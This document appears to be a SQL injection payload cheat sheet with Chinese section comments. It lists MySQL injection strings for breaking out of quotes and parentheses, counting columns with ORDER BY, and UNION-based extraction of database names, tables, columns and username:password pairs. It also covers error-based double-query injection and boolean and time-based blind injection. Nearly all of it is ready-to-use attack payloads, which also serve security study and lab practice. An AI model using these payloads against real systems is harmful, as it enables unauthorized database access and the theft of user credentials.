#常规注入 ' --+ ' --%20 ' # ' %23 ' and 1=1 --+ ' and 1=2 --+ ' and 1=2 union select * from admin --+ ' and 1=2 union select * from user --+ ' and 1=2 union select * from users --+ #爆字段长度 ' order by 1 --+ ' order by 2 --+ ' order by 3 --+ ' order by 4 --+ ' order by 5 --+ ' order by 6 --+ ' order by 7 --+ ' order by 8 --+ ' order by 9 --+ ' order by 10 --+ #爆数据库信息,这仅限于字段长度为1 ' and 1=2 union all select version() --+ ' and 1=2 union all select user() --+ ' and 1=2 union all select database() --+ #判断操作系统 ' and 1=2 union all select @@global.version_compile_os from mysql.user --+ #数据库权限,返回正常说明root权限; ' and ord(mid(user(),1,1))=114 --+ #爆数据 ' and 1=2 union select user(),version(),database(),@@datadir,SCHEMA_NAME,current_user(),7,8,9,10 from information_schema.SCHEMATA limit 0,1 --+ ' and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1--+ ' and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+ ' and 1=2 union select 1,2,3,group_concat(COLUMN_NAME),5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+ ' and 1=2 union select 1,2,3,group_concat(username),5,6,7,8,9,10 from table_name --+ ' and 1=2 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from table_name --+ #不使用注释符 ' and '1 ' union select 1 and '1 ' union select 1,2 and '1 ' and 1=2 union select 1,version(),3 and '1 ' or '1 #带括号防注入 ') --+ ') --%20 ') # ') %23 #双引号防注入 " --+ " --%20 " # " %23 #双引号+括号 ") --+ ") --%20 ") # ") %23 #双查询输入 #统计有多少字段 select count(*) from table_name; #随机数生成 select rand(); select rand()*4; #浮点数 select floor(rand()); select floor(rand()*4); #别名 select floor(rand()*4) as query; #分组 select username,password from user group by username; #两次查询 select(select database()); #连接字符串concat(str1,str2) select concat((select database())); select concat(0x3a,0x3a,(select database()),0x3a,0x3a); select concat(0x3a,0x3a,(select database()),0x3a,0x3a) as query; select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query; select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user; select count(*),concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user group by query; select count(*),concat(0x3a,0x3a,(select user()),0x3a,floor(rand()*2)) as query from user group by query; select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query; ' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+ ' and 1=2 union (select * from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+ #盲注 #bool型盲注 select database(); #判断长度 select length(database()); #截取字符串substr(str,num1,num2) num1:从第几个开始取;num2:取多少个 select substr(database(),1,1); #ascii码 select ascii(substr(database(),1,1)); ' and 1<2 --+ ' and (ascii(substr((select database()),1,1)))=98--+ #时间型盲注 #睡眠 select sleep(1); #进行判断 select if((select database())="bloodzero",sleep(10),null); ' and sleep(10) --+ ' and if((select database())="bloodzero",sleep(10),null)--+